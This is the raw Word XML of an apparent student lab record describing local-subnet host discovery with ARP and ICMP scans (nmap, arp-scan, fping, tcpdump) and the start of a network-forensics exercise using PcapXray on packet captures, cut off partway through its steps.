    <w:p w14:paraId="36F0983B" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00F13BE9" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="470CCDEC" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00F13BE9" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13BE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5144C34E" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00F13BE9" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13BE9">
        <w:t>Use ARP scanning to detect live hosts on the local subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560568BE" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00F13BE9" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13BE9">
        <w:t>Use ICMP (ping) scanning to discover hosts that reply to echo requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28901FF6" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00F13BE9" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13BE9">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13BE9">
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13BE9">
        <w:t xml:space="preserve"> to capture and inspect the probe and reply packets for verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C26D92A" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00F13BE9" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13BE9">
        <w:t>Compare results and explain why a host may appear in one scan but not another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965EDF6" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00535B9B" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="1666B7B5" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00CF32A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tasks</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA25D36" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00107BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064D1D24" wp14:editId="45318909">
            <wp:extent cx="5715000" cy="3403927"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2095128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28499" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724116" cy="3409357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DEE53D" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00621E3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D831AD" wp14:editId="7DF68A8B">
            <wp:extent cx="5731510" cy="3390265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="4909103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10393" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3390265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D427A" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00040EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="762DE862" wp14:editId="1862EA79">
            <wp:extent cx="5731510" cy="1108075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15106944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94482" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1108075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BC430B" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00CE5805">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57116560" wp14:editId="516AEE3D">
            <wp:extent cx="5731510" cy="4120515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="119542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23381" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4120515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7664FF98" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00836F23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E427640" wp14:editId="25C9F362">
            <wp:extent cx="5731510" cy="1652905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="3239998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99844" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1652905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE5B10" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="003D6A17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FE60999" wp14:editId="327EC331">
            <wp:extent cx="5731510" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="7351028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02875" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1724025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE83D92" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="009B25EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="481A3FC4" wp14:editId="44130FE8">
            <wp:extent cx="5731510" cy="1587500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="125305468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54684" name="Picture 1" descr="A screenshot of a chat&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1587500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8ECBD4" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="001F39F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFEE0E1" wp14:editId="2A5620B5">
            <wp:extent cx="5731510" cy="727075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="348121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21659" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="727075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="232E49ED" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="41D6CEA2" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="68C1E5E8" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00CF32A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719DD2F0" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00B37A8C" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00B37A8C">
        <w:t xml:space="preserve"> Ran an ARP scan on the local network (e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t xml:space="preserve">-scan or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t xml:space="preserve"> -PR) and noted responsive IPs/MACs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB24356" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00B37A8C" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00B37A8C">
        <w:t xml:space="preserve"> Performed an ICMP ping-scan (e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t xml:space="preserve"> -PE or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t>fping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t>) and recorded which hosts replied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE27B7" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00B37A8C" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00B37A8C">
        <w:t xml:space="preserve"> Started </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B37A8C">
        <w:t xml:space="preserve"> during the ping scan to capture ICMP Echo Requests/Replies (and ARP requests/replies) for later inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD6596B" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="7C3131B6" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="2CDF66DF" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="19510ED5" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="44DC5B34" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="272FFEBD" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="459E860D" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="4C9D4A17" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="75932BE3" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="009B0803"/>
    <w:p w14:paraId="2117BB93" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EMONSTRATE NETWORK FORENSICS USING PCAPXRAY TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2683BF16" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="009C01F1"/>
    <w:p w14:paraId="274669D0" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:r>
        <w:t>Ex. No: 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53561A97" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="009C01F1"/>
    <w:p w14:paraId="2946FE61" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23999BD1" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve">Network forensics involves capturing, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve">, and investigating network traffic to detect malicious activities or anomalies. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>PcapXray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve"> is a tool that visualizes packet capture (PCAP) files, showing hosts, connections, web/Tor traffic, and potentially malicious activities in a network. It helps investigators quickly identify suspicious traffic flows and extract relevant payloads for deeper analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB6CD4" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="009C01F1"/>
    <w:p w14:paraId="068ADAEF" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FDB51B" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve"> captured network traffic using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>PcapXray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve"> and identify hosts, traffic patterns, and suspicious network activities for forensic investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B197BB6" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1"/>
    <w:p w14:paraId="1BABEA15" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3FEFF0" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Install prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E48888" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve">Install Python 3, pip, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>Graphviz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>Tkinter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>, and required libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425681AD" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve">Clone the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>PcapXray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve"> repository and install dependencies using pip install -r requirements.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9B380" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Prepare input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27ED52" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Obtain a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve"> file containing network traffic to be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC848FF" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Ensure the PCAP is from a safe/testing source for learning purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA508D1" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve">Launch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>PcapXray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850443F" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Open main.py in the repository using Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A56E45A" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Load the selected .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve"> file via the GUI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628324C3" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046081F">
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046081F">
        <w:t xml:space="preserve"> traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C264566" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Observe the network graph of hosts (nodes) and connections (edges).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43413DDC" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:lastRenderedPageBreak/>
        <w:t>Filter traffic based on Web, Tor, Malicious, DNS, or ICMP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EEF8AA" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Click on nodes/edges to view traffic details, HTTP requests, or extracted payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C66022" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
